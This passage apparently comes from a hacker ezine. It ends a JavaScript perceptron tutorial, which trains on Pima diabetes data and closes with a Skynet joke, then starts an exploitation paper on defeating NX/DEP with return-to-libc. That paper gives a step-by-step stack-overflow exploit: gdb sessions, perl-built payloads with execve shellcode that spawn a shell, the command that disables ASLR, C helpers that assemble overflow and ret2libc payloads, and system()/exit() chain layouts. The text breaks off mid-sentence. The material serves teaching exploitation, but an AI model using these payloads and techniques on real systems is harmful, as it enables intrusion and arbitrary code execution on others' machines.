[10,122,78,31,0,27.6,0.512,45,0],
[4,103,60,33,192,24.0,0.966,33,0],
[11,138,76,0,0,33.2,0.420,35,0],
[9,102,76,37,0,32.9,0.665,46,1],
[2,90,68,42,0,38.2,0.503,27,1],
[4,111,72,47,207,37.1,1.390,56,1],
[3,180,64,25,70,34.0,0.271,26,0],
[7,133,84,0,0,40.2,0.696,37,0],
[7,106,92,18,0,22.7,0.235,48,0],
[9,171,110,24,240,45.4,0.721,54,1],
[7,159,64,0,0,27.4,0.294,40,0],
[0,180,66,39,0,42.0,1.893,25,1],
[1,146,56,0,0,29.7,0.564,29,0]
];
var targets = [];
for( var i = 0; i < inputs.length; i++ )
{
targets.push( inputs[i].pop() );
}
var dimensions = 8; // each row has 8 values left once the target column is popped off
This dataset represents a subset of the Pima Indian population and whether each individual has
diabetes (the last column, which is popped off and put into 'targets'). If this code is placed into
the code textarea, the accuracy of the perceptron in telling if someone has diabetes or not is
almost non-existent. Unlike the above examples, this data set cannot be graphed and is a good
example of real world data. With data like this, you should not train on all of it, but rather train
on a subset of the data and then perform a check on the rest of the data, thus more accurately
gauging the perceptron's ability to learn and generalize its solution.
How do we do the training on the subset of the data? On the HTML page, there is a check box that,
when checked, will simply split the data in half and train on one half of the data and test with the
other half. This is quite useful and can gauge how well the perceptron is able to generalize its
solution to the set of data that has been presented.
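What the check box does can be approximated by the sketch below. It is a guess at the idea, not the
page's actual code: the helper names, the zero starting weights, and the tiny made-up data set are
all assumptions for illustration. The first half of the rows is used for training and the second
half only for scoring.

```javascript
// Output of a perceptron whose weight in slot 0 belongs to the bias input (-1).
function fires(weights, inputs) {
  var sum = -1 * weights[0];
  for (var i = 0; i < inputs.length; i++) {
    sum += weights[i + 1] * inputs[i];
  }
  return sum > 0 ? 1 : 0;
}

// Fixed number of passes over the training rows, starting from all-zero weights.
function train(samples, targets, dimensions, rate, epochs) {
  var w = [];
  for (var d = 0; d <= dimensions; d++) {
    w.push(0);
  }
  for (var epoch = 0; epoch < epochs; epoch++) {
    for (var k = 0; k < samples.length; k++) {
      var y = fires(w, samples[k]);
      var biased = [-1].concat(samples[k]);
      for (var i = 0; i < w.length; i++) {
        w[i] += rate * (targets[k] - y) * biased[i];
      }
    }
  }
  return w;
}

// Fraction of rows whose predicted output matches the target.
function accuracy(weights, samples, targets) {
  var correct = 0;
  for (var k = 0; k < samples.length; k++) {
    if (fires(weights, samples[k]) === targets[k]) {
      correct++;
    }
  }
  return correct / samples.length;
}

// Made-up rows: two features, label 1 roughly when the features are large.
var rows = [[0, 0], [2, 2], [0, 1], [2, 1], [1, 0], [1, 2], [0.5, 0], [2, 0.5]];
var labels = [0, 1, 0, 1, 0, 1, 0, 1];

var half = Math.floor(rows.length / 2);
var trainedWeights = train(rows.slice(0, half), labels.slice(0, half), 2, 0.25, 30);
var heldOutAccuracy = accuracy(trainedWeights, rows.slice(half), labels.slice(half));
console.log("accuracy on the unseen half:", heldOutAccuracy);
```

The number that matters is the accuracy on the half the perceptron never saw. A high score on the
training half alone says nothing about whether the solution generalizes.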
This method can help verify how well the perceptron has learned something. Another method to help
improve the learning ability of the perceptron is to normalize the data or, in essence, rescale each
column to a common range so that no single large-valued column dominates the weighted sum.
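One common way to normalize is min-max scaling, sketched below. This is only one possible choice
(the article does not say which method the author had in mind), and the function name
normalizeColumns is made up. Every column is rescaled to the range 0 to 1 so that a column measured
in the hundreds does not drown out a column measured in fractions.

```javascript
// Rescale every column of a 2D array to the range [0, 1].
// A column whose values are all identical is mapped to 0 to avoid dividing by zero.
function normalizeColumns(rows) {
  var columns = rows[0].length;
  var mins = [];
  var maxs = [];
  for (var c = 0; c < columns; c++) {
    var values = rows.map(function (row) { return row[c]; });
    mins.push(Math.min.apply(null, values));
    maxs.push(Math.max.apply(null, values));
  }
  return rows.map(function (row) {
    return row.map(function (value, c) {
      var range = maxs[c] - mins[c];
      return range === 0 ? 0 : (value - mins[c]) / range;
    });
  });
}

// Illustrative rows: the second column is much larger than the first before scaling.
var scaled = normalizeColumns([[0, 10], [5, 20], [10, 30]]);
console.log(scaled);
```

The target column should be popped off before scaling, as the 'targets' loop above already does, so
that only the input features are rescaled.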
You, the reader, have been hoping all this time to learn the answer to the initial question of this
article - how does Skynet work? However, all you got instead was some garbled math and a web page.
But, the principle behind this method is how Skynet could learn, classify dangerous enemies, and
ultimately kill all humans.
Some other applications for this perceptron and neural networks are:
- OCR to break captchas.
- Recommending items to a user.
- Predicting future events based on past ones.
- Fitting a line, plane, or hyperplane to a set of data.
- Many more.
Enjoy, Elchupathingy
[==================================================================================================]
-=[ 0x06 Defeating NX/DEP With return-to-libc and ROP
-=[ Author: storm
-=[ Email: storm@gonullyourself.org
-=[ Website: http://gonullyourself.org/
Table of Contents
I. Introduction
II. Background
III. The Problem
IV. Return-to-libc
V. Return-to-PLT
VI. Return-to-PLT + GOT Overwrite
VII. Return-to-libc by neg ROP
VIII. References and Further Reading
I. Introduction
===============
The return-to-libc attack, commonly abbreviated as ret2libc, is a method of exploiting memory
corruption vulnerabilities on systems enabling non-executable (NX) stacks. First publicly discussed
by the security researcher Solar Designer in the late 90s, ret2libc attacks are still relevant in
the modern realm of exploitation, but have mostly made way for Return-Oriented Programming (ROP),
which is a generalization of the ret2libc technique.
It should be noted that all technical examples in this paper were performed on a Fedora Core 14
machine. While many of these techniques are universal, some OSes may employ certain memory
protections by default that break the examples. For instance, stack canaries are enabled by default
on Ubuntu systems and should be disabled with the gcc -fno-stack-protector flag at compile-time.
II. Background
==============
Before proceeding, the reader should be familiar with traditional stack-based buffer overflows. For
the sake of comprehension, a short review will be provided. It should be noted that in this simple
example, memory protections such as DEP, ASLR, and stack canaries are disabled.
Given the following source code (from http://en.wikipedia.org/wiki/Stack_buffer_overflow):
#include <string.h>
void foo (char *bar)
{
    char c[12];
    strcpy(c, bar); // no bounds checking...
}
int main (int argc, char **argv)
{
    foo(argv[1]);
}
We can see that argv[1] is passed as an argument to the function foo(). A buffer of 12 bytes is
allocated and given the name 'c'. A call to strcpy() copies the string from the buffer 'bar'
(formerly argv[1]) into 'c'. The problem lies within the fact that no bounds check is performed on
the buffer 'bar' before being copied into 'c', allowing any string greater than 12 bytes long
(trailing null byte included) to be written past the 12 bytes allocated. By allowing this, we have
the potential to overwrite data on the stack critical to the program's behavior.
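For contrast, here is a minimal sketch of the bounds check that foo() is missing. The helper name
copy_bounded() is our own invention and is not part of the example program or libc; it simply
refuses any string that won't fit instead of writing past the end of the buffer.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not in the original program): copy src into dst
 * only if the string and its trailing null byte fit in dst_size bytes.
 * Returns 0 on success, -1 if the input is too long. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);

    if (len + 1 > dst_size)
        return -1;              /* would overflow: reject, write nothing */

    memcpy(dst, src, len + 1);  /* copies the null terminator as well */
    return 0;
}
```

With char c[12], a call such as copy_bounded(c, sizeof(c), bar) accepts at most 11 characters plus
the null byte and rejects anything longer.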
Specifically, a pointer saved on the stack named the "return address" is of particular interest to
us. This pointer is present on the stack due to the way function calls are performed within
programs. Let's step our way through foo() in the program above. Here, we set a breakpoint just
before the call is initiated:
Breakpoint 1, 0x080483f2 in main ()
(gdb) x/5i $eip
=> 0x80483f2 <main+20>: call 0x80483c4 <foo>
0x80483f7 <main+25>: leave
0x80483f8 <main+26>: ret
0x80483f9: nop
0x80483fa: nop
(gdb) x/16x $esp
0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4
0xbfffefc0: 0x08048400 0x00000000 0xbffff048 0x00212e36
0xbfffefd0: 0x00000002 0xbffff074 0xbffff080 0xb7fff478
0xbfffefe0: 0x00110414 0xffffffff 0x001f8fbc 0x0804822c
(gdb)
We start off by looking at the state of the stack before the function call. Continuing, let's take
this step-by-step.
(gdb) si
0x080483c4 in foo ()
(gdb) x/16x $esp
0xbfffefac: 0x080483f7 0xbffff265 0x08048310 0x0804840b
0xbfffefbc: 0x00381ff4 0x08048400 0x00000000 0xbffff048
0xbfffefcc: 0x00212e36 0x00000002 0xbffff074 0xbffff080
0xbfffefdc: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
For those unfamiliar with gdb, note that the 'si' command is shorthand for 'step instruction', which
allows us to walk through the assembly code instruction-by-instruction. We see that by entering
foo(), the pointer 0x080483f7 is pushed onto the stack. Looking above, we notice that this is the
address of the next instruction within main(). This pointer is the return address and will later be
popped back into %eip in the epilogue of foo(). Continuing:
(gdb) x/10i $eip
=> 0x80483c4 <foo>: push %ebp ; Push the frame pointer onto the stack
0x80483c5 <foo+1>: mov %esp,%ebp ; Address of saved fp becomes new %ebp
0x80483c7 <foo+3>: sub $0x28,%esp ; Allocate space for local variables
0x80483ca <foo+6>: mov 0x8(%ebp),%eax ; Copy pointer to 'bar' to %eax
0x80483cd <foo+9>: mov %eax,0x4(%esp) ; Set up 'bar' as 2nd arg to strcpy()
0x80483d1 <foo+13>: lea -0x14(%ebp),%eax ; Copy pointer to 'c' to %eax
0x80483d4 <foo+16>: mov %eax,(%esp) ; Set up 'c' as 1st arg to strcpy()
0x80483d7 <foo+19>: call 0x80482f4 <strcpy@plt> ; Perform library call to strcpy()
0x80483dc <foo+24>: leave ; Copy %ebp to %esp, pop fp to %ebp
0x80483dd <foo+25>: ret ; Pop return address to %eip
(gdb)
By manipulating the return address stored on the stack before the function epilogue, we directly
influence the value of %eip, redirecting execution of the program to anywhere we choose.
Setting a breakpoint for 0x80483d7, let's look at the stack just before the strcpy() call:
Breakpoint 2, 0x080483d7 in foo ()
(gdb) x/16x $esp
0xbfffef80: 0xbfffef94 0xbffff265 0xbfffef98 0x080482c0
0xbfffef90: 0x00000000 0x08049644 0xbfffefc8 0x08048419
0xbfffefa0: 0xb7fff478 0x00382cc0 0xbfffefc8 0x080483f7
0xbfffefb0: 0xbffff265 0x08048310 0x0804840b 0x00381ff4
(gdb)
We see that strcpy() is being given two pointers as its first and second arguments: a pointer to
the buffer 'c' and a pointer to the buffer 'bar', respectively. We also see our saved frame pointer
and return address further down the stack (at higher addresses), at 0xbfffefa8 and 0xbfffefac,
respectively. By writing 0xbfffefb0 - 0xbfffef94 = 0x1c = 28 bytes to 'c', we overwrite the entire
return address and gain control of EIP:
(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x80483dd
Breakpoint 3 at 0x80483dd
(gdb) run `perl -e'print "A"x28'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x28'`
Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>: ret
(gdb) x/x $esp
0xbfffef8c: 0x41414141
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x080483dd in foo ()
(gdb)
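The 28-byte figure is just pointer arithmetic on the addresses from the stack dump. A small sketch,
with macro and function names of our own choosing:

```c
#include <stdint.h>

/* Addresses taken from the gdb session above. */
#define BUF_ADDR      0xbfffef94u  /* start of 'c' (%ebp - 0x14) */
#define SAVED_FP_ADDR 0xbfffefa8u  /* saved frame pointer        */
#define RET_ADDR      0xbfffefacu  /* saved return address       */

/* Bytes of padding needed before the first byte of the target slot. */
uint32_t offset_to(uint32_t buf, uint32_t slot)
{
    return slot - buf;
}

/* Total bytes to write so that all four bytes of a 32-bit return
 * address are overwritten. */
uint32_t overwrite_length(uint32_t buf, uint32_t ret)
{
    return offset_to(buf, ret) + 4;
}
```

Here offset_to(BUF_ADDR, RET_ADDR) is 24 and overwrite_length(BUF_ADDR, RET_ADDR) is 28, so 24
bytes of filler are followed by the 4 bytes that land in %eip.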
By stashing compiled code on the stack itself, we can redirect execution to the location of our
"shellcode" and drop a shell. First, let's see where the shellcode lands:
(gdb) run `perl -e'print "A"x28 . "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0
\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x28 . "\xeb\x16\x5b\x31
\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff
\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>: ret
(gdb) x/16x $esp
0xbfffef6c: 0x41414141 0x315b16eb 0x074388c0 0x89085b89
0xbfffef7c: 0x0bb00c43 0x8d084b8d 0x80cd0c53 0xffffe5e8
0xbfffef8c: 0x69622fff 0x68732f6e 0xbffff000 0xbffff040
0xbfffef9c: 0xb7fff478 0x00110414 0xffffffff 0x001f8fbc
We see our shellcode is located at 0xbfffef70, so let's now overwrite the return address with this,
ordering the bytes in reverse to account for little endianness:
(gdb) run `perl -e'print "A"x24 . "\x70\xef\xff\xbf" . "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b
\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e
\x2f\x73\x68"'`
Starting program: /home/storm/Desktop/audit/example `perl -e'print "A"x24 . "\x70\xef\xff\xbf" .
"\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c
\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"'`
Breakpoint 3, 0x080483dd in foo ()
(gdb) x/i $eip
=> 0x80483dd <foo+25>: ret
(gdb) x/16x $esp
0xbfffef6c: 0xbfffef70 0x315b16eb 0x074388c0 0x89085b89
0xbfffef7c: 0x0bb00c43 0x8d084b8d 0x80cd0c53 0xffffe5e8
0xbfffef8c: 0x69622fff 0x68732f6e 0xbffff000 0xbffff040
0xbfffef9c: 0x00111478 0x00110414 0xffffffff 0x001f8fbc
(gdb) c
Continuing.
process 22006 is executing new program: /bin/bash
sh-4.1$
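The perl one-liner above can be mirrored in C. The following is a sketch only: pack_le32() and
build_stack_payload() are hypothetical helpers, and the padding length, return address, and
shellcode are whatever your own debugging session produced.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value least-significant byte first (little endian). */
void pack_le32(unsigned char *out, uint32_t value)
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Lay out: pad_len filler bytes | return address | shellcode.
 * Returns the payload length, or 0 if it does not fit in out. */
size_t build_stack_payload(unsigned char *out, size_t out_size,
                           size_t pad_len, uint32_t ret_addr,
                           const unsigned char *code, size_t code_len)
{
    size_t total = pad_len + 4 + code_len;

    if (total > out_size)
        return 0;

    memset(out, 'A', pad_len);
    pack_le32(out + pad_len, ret_addr);
    memcpy(out + pad_len + 4, code, code_len);
    return total;
}
```

Calling pack_le32() with 0xbfffef70 yields the bytes \x70\xef\xff\xbf, matching the string handed
to perl.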
III. The Problem
================
Modern hardware and operating systems support a feature called NX bit/DEP, which flags regions of
memory as non-executable. As a security precaution, compilers now mark the stack non-executable to
prevent the execution of shellcode in buffer overflow attacks. Thus, overwriting the return address
with the address of our shellcode on the stack results in a segfault.
To exemplify this point, we can see specifically which regions of memory have what permissions using
the following program:
#include <stdio.h>
int main (int argc, char **argv)
{
    FILE *fp = fopen("/proc/self/maps", "r");
    char line[1024];
    if (fp == NULL) // bail out if /proc is unavailable
    {
        perror("fopen");
        return 1;
    }
    while(fgets(line, sizeof(line), fp) != NULL)
    {
        printf("%s", line);
    }
    fclose(fp);
    return 0;
}
By running this program, we print the contents of /proc/self/maps. We see that by default, our
program's stack does not possess +x permissions:
[storm@Dysthymia audit]$ ./stacky
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r--p 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rw-p 0001d000 fd:01 19335 /lib/ld-2.13.so
001fc000-0037f000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
0037f000-00380000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
00380000-00382000 r--p 00183000 fd:01 24337 /lib/libc-2.13.so
00382000-00383000 rw-p 00185000 fd:01 24337 /lib/libc-2.13.so
00383000-00386000 rw-p 00000000 00:00 0
00d21000-00d22000 r-xp 00000000 00:00 0 [vdso]
08048000-08049000 r-xp 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky
08049000-0804a000 rw-p 00000000 fd:03 339055 /home/storm/Desktop/audit/stacky
0990b000-0992c000 rw-p 00000000 00:00 0 [heap]
b7893000-b7894000 rw-p 00000000 00:00 0
b78ae000-b78b0000 rw-p 00000000 00:00 0
bfcf5000-bfd16000 rw-p 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$
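If you'd rather have a program answer the question directly, the permission check can be sketched
as a small parser for a single maps line. is_executable_stack() is a hypothetical helper, and it
assumes the usual "start-end perms offset dev inode path" layout shown above.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if the given /proc/<pid>/maps line describes the [stack]
 * mapping and that mapping has the execute bit set, 0 otherwise. */
int is_executable_stack(const char *line)
{
    unsigned long start, end;
    char perms[5] = "";

    if (strstr(line, "[stack]") == NULL)
        return 0;

    /* perms is a 4-character field such as "rw-p" or "rwxp" */
    if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
        return 0;

    return perms[2] == 'x';
}
```

Fed the [stack] line from the output above, it returns 0, since the permissions field reads rw-p.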
We can manually flip the executable stack flag in our program's ELF header, disabling this memory
protection for the program:
[storm@Dysthymia audit]$ execstack -s ./stacky
[storm@Dysthymia audit]$ ./stacky
00110000-00111000 rwxp 00000000 00:00 0
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r-xp 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rwxp 0001d000 fd:01 19335 /lib/ld-2.13.so
0034f000-00350000 rwxp 00000000 00:00 0
00350000-004d3000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
004d3000-004d4000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
004d4000-004d6000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so
004d6000-004d7000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so
004d7000-004da000 rwxp 00000000 00:00 0
00673000-00674000 r-xp 00000000 00:00 0 [vdso]
009d5000-009d6000 rwxp 00000000 00:00 0
08048000-08049000 r-xp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky
08049000-0804a000 rwxp 00000000 fd:03 339088 /home/storm/Desktop/audit/stacky
08adf000-08b00000 rwxp 00000000 00:00 0 [heap]
bfa61000-bfa82000 rwxp 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$
You may have noticed something odd about the output of this program. Comparing the output of the
two runs, we notice that the addresses of loaded libraries and certain other areas of memory
changed. This is due to a memory protection technique called Address Space Layout Randomization
(ASLR). Because the location of data in a process's address space is randomized, exploit writers
cannot reliably predict where certain key functions or code are located in memory, turning reliable
exploits into improbable gambles. An area of research is devoted to exploiting applications
protected by ASLR, but that is well beyond the scope of this paper.
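One quick way to see ASLR at work is to compare where a library landed in two runs. The sketch
below parses the start address out of a maps line; map_start() and mapping_moved() are
hypothetical helpers, meant to be fed the same mapping's line from two separate runs.

```c
#include <stdio.h>

/* Parse the start address from a /proc/<pid>/maps line.
 * Returns 0 on success, -1 if the line is not in the expected format. */
int map_start(const char *line, unsigned long *start)
{
    unsigned long end;

    if (sscanf(line, "%lx-%lx", start, &end) != 2)
        return -1;
    return 0;
}

/* Returns 1 if the same mapping sits at different addresses in two runs,
 * 0 if the address is identical, -1 on a parse error. */
int mapping_moved(const char *run1_line, const char *run2_line)
{
    unsigned long a, b;

    if (map_start(run1_line, &a) != 0 || map_start(run2_line, &b) != 0)
        return -1;
    return a != b;
}
```

For the libc text mapping in the two ./stacky runs above (001fc000 versus 00350000),
mapping_moved() returns 1.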
For the sake of taking one step at a time, let's disable ASLR for our examples:
[storm@Dysthymia audit]$ su -
Password:
[root@Dysthymia ~]# echo 0 > /proc/sys/kernel/randomize_va_space
[root@Dysthymia ~]# logout
[storm@Dysthymia audit]$ ./stacky
00110000-00111000 r-xp 00000000 00:00 0 [vdso]
00111000-00113000 rwxp 00000000 00:00 0
0012d000-0012e000 rwxp 00000000 00:00 0
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r-xp 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rwxp 0001d000 fd:01 19335 /lib/ld-2.13.so
001fc000-0037f000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
0037f000-00380000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
00380000-00382000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so
00382000-00383000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so
00383000-00386000 rwxp 00000000 00:00 0
08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
08049000-0804a000 rwxp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
0804a000-0806b000 rwxp 00000000 00:00 0 [heap]
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$ ./stacky
00110000-00111000 r-xp 00000000 00:00 0 [vdso]
00111000-00113000 rwxp 00000000 00:00 0
0012d000-0012e000 rwxp 00000000 00:00 0
001db000-001f8000 r-xp 00000000 fd:01 19335 /lib/ld-2.13.so
001f8000-001f9000 r-xp 0001c000 fd:01 19335 /lib/ld-2.13.so
001f9000-001fa000 rwxp 0001d000 fd:01 19335 /lib/ld-2.13.so
001fc000-0037f000 r-xp 00000000 fd:01 24337 /lib/libc-2.13.so
0037f000-00380000 ---p 00183000 fd:01 24337 /lib/libc-2.13.so
00380000-00382000 r-xp 00183000 fd:01 24337 /lib/libc-2.13.so
00382000-00383000 rwxp 00185000 fd:01 24337 /lib/libc-2.13.so
00383000-00386000 rwxp 00000000 00:00 0
08048000-08049000 r-xp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
08049000-0804a000 rwxp 00000000 fd:03 263455 /home/storm/Desktop/audit/stacky
0804a000-0806b000 rwxp 00000000 00:00 0 [heap]
bffdf000-c0000000 rwxp 00000000 00:00 0 [stack]
[storm@Dysthymia audit]$
Much better.
Getting back to the original problem, the question is, how can an attacker successfully and reliably
exploit a simple stack-based buffer overflow when the stack is flagged non-executable? With
ret2libc, of course!
IV. Return-to-libc
==================
The premise of ret2libc is actually quite simple. Thinking back to how a standard buffer overflow
works, we recognize that our ultimate goal is to return into code that does our evil bidding, most
likely dropping a bash prompt or spawning a reverse shell. Knowing that we are unable to provide
our own code to return into (thanks to non-executable stack and heap), we must take a step back and
think about our options.
Our guidelines are as follows:
- Code must be (obviously) present in the process's address space at the time of exploitation
- Code must be flagged executable
- Code must be located at a predictable address
- Code must perform an action that is beneficial to our goals (spawning a shell)
Where will we ever find code that satisfies all of our needs?
Oh, right. libc, the C standard library implementation on Linux.
Let's let Wikipedia be our guide:
The C standard library consists of a set of sections of the ANSI C standard in the
programming language C. They describe a collection of headers and library routines
used to implement common operations such as input/output and string handling.
Unix-like systems typically have a C library in shared library form.
- http://en.wikipedia.org/wiki/Libc
To clarify and expand on the definition, libc is a shared library present on nearly all Linux
systems that is, by default, linked against every program compiled with gcc. libc is an
implementation of the C standard, providing the code that performs common, rudimentary operations
such as printing strings and allocating memory. Every time you make a function call to printf()
or malloc() from within a C program, you are most likely running code in libc.
Let's go down our checklist. libc is certainly present in the address space of almost every process
running on Linux. The code is flagged executable, because it is legitimate code used by the program
itself. By disabling ASLR, we are ensuring that the library will be loaded at the same base address
every time, allowing us to reliably predict where in memory it will be located. Since libc provides
an exceptionally wide array of functions, there is a good chance we can abuse one of them to gain
access to the system.
Let's start building a template for our exploit:
AAAAAAAAAAAAAAAAAAAAAAAA [ libc function ] [ return-to ] [ arg1 ] [ arg2 ] ...
^                                ^                           |        |
|                                |                           |        |
overflow ("A"x24)                --------------------------------------
Obviously, we want to return into a libc function that lets us execute arbitrary code. A good
candidate is system(), although there are a number of methods using different functions.
[storm@Dysthymia audit]$ gdb -q ./example
Reading symbols from /home/storm/Desktop/audit/example...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e1
(gdb) run
Starting program: /home/storm/Desktop/audit/example
Breakpoint 1, 0x080483e1 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x235eb0 <__libc_system>
(gdb)
Looking at the output of gdb, we see that system() resides in memory at 0x00235eb0, so let's add
that to our exploit.
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ arg1 ] [ arg2 ] ...
^                                  ^                            |       |
|                                  |                            |       |
overflow ("A"x24)                  --------------------------------------
                                &system
Now we need to provide an argument to system(), which is a pointer to a null-terminated string of
the command being executed. The simple solution is just to give it a pointer to "/bin/bash", which
we can do by either a) writing it into memory after the exploit string itself, or b) re-using an
already existing instance of the string in memory. Let's be lazy and choose the latter.
(gdb) find $esp, 0xbfffffff, "/bin/bash"
0xbffff310
1 pattern found.
(gdb) x/s 0xbffff310
0xbffff310: "/bin/bash"
(gdb) x/s 0xbffff30a
0xbffff30a: "SHELL=/bin/bash"
(gdb)
Conveniently, we can leverage the SHELL environment variable here. Now that we have a pointer to
our command string, let's update the exploit.
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ return-to ] [ \x10\xf3\xff\xbf ]
^                                  ^                                  |
|                                  |                                  |
overflow ("A"x24)                  ------------------------------------
                                &system                       arg1: "/bin/bash"
The return-to pointer serves as the return address for our libc function. Strictly speaking, it
doesn't need to be valid for the exploit to work, but it's common to return to exit() afterwards to
end the process cleanly and prevent any alerts due to a crashed process. These alerts may be viewed
by monitoring the tail of /var/log/messages (on most distributions).
(gdb) p exit
$2 = {void (int)} 0x22ac00 <exit>
(gdb)
For the sake of adding more unnecessary arrows to the diagram, our finished exploit now looks like:
                                           &exit
                                    --------------------
                                    |                 \/
AAAAAAAAAAAAAAAAAAAAAAAA [ \xb0\x5e\x23\x00 ] [ \x00\xac\x22\x00 ] [ \x10\xf3\xff\xbf ]
^                                ^                                            |
|                                |                                            |
overflow ("A"x24)                ----------------------------------------------
                              &system                                 arg1: "/bin/bash"
Yeah, cool. Too bad it doesn't work.
As you probably noticed, our exploit contains null bytes everywhere. This is a huge problem, since
we're using strcpy() to copy our exploit string and it will stop as soon as the first null byte is
encountered.
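To see exactly where strcpy() would give up, we can lay the three pointers out as in the diagram
and look for the first zero byte. This is only a sketch: build_ret2libc() and first_null_offset()
are made-up helper names, and the addresses you pass in are the ones gdb reported.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Lay out: pad_len filler bytes | &function | return-to | arg1,
 * each pointer stored little endian. out must hold pad_len + 12 bytes.
 * Returns the payload length. */
size_t build_ret2libc(unsigned char *out, size_t pad_len,
                      uint32_t func, uint32_t ret_to, uint32_t arg1)
{
    uint32_t words[3];
    size_t i, j;

    words[0] = func;
    words[1] = ret_to;
    words[2] = arg1;

    memset(out, 'A', pad_len);
    for (i = 0; i < 3; i++)
        for (j = 0; j < 4; j++)
            out[pad_len + 4 * i + j] =
                (unsigned char)((words[i] >> (8 * j)) & 0xff);

    return pad_len + 12;
}

/* Offset of the first 0x00 byte, i.e. where strcpy() stops copying.
 * Returns len if the payload contains no null bytes. */
size_t first_null_offset(const unsigned char *payload, size_t len)
{
    const unsigned char *p =
        (const unsigned char *)memchr(payload, 0x00, len);

    return p ? (size_t)(p - payload) : len;
}
```

With system() at 0x00235eb0 and 24 bytes of padding, the first null byte sits at offset 27.
strcpy() copies everything up to and including that byte and nothing after it, so the exit()
pointer and the argument never reach the stack.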
There are actually two factors contributing to having null bytes in this exploit. The first, most
prominent factor is a memory protection called ASCII-Armor, which maps important libraries to
addresses that contain a null byte. As observed, the addresses of system() and exit(), as well as
every other function in libc, start with 0x00.
The second factor is a coincidence: the address of exit() happens to contain another null byte. In
addition to the one introduced by ASCII-Armor, the least significant byte of the address is also 0x00.
This is not an especially huge issue, however, since we can simply jump to an offset of exit() that
doesn't alter its actual functionality. Let's take a look:
(gdb) x/10i exit
0x22ac00 <exit>: push %ebp
0x22ac01 <exit+1>: mov %esp,%ebp
0x22ac03 <exit+3>: push %edi
0x22ac04 <exit+4>: push %esi
0x22ac05 <exit+5>: push %ebx
0x22ac06 <exit+6>: call 0x212c6f <__i686.get_pc_thunk.bx>
0x22ac0b <exit+11>: add $0x1573e9,%ebx
0x22ac11 <exit+17>: sub $0x2c,%esp
0x22ac14 <exit+20>: mov 0x8(%ebp),%edi
0x22ac17 <exit+23>: mov 0x330(%ebx),%esi
(gdb)
0x0022ac01 looks pretty good. The only instruction we're skipping is push %ebp, which won't matter
anyways since exit() doesn't return, thus having no need to unwind the stack.
Note that should a positive offset (exit+X) not exist, we can instead search lower in memory and
find a potential negative offset (exit-X). We can do this because the function adjacent to exit()
doesn't terminate with a ret instruction, so jumping into it won't return but instead continue
executing into the next function, which is conveniently exit().
(gdb) x/3i exit-1
0x22abff: add %dl,-0x77(%ebp)
0x22ac02 <exit+2>: in $0x57,%eax
0x22ac04 <exit+4>: push %esi
(gdb)
Oops, looks like an offset of -1 will cause instructions in exit() to be interpreted incorrectly.
Remember that everything in memory is simply data until it is interpreted and given meaning, so by
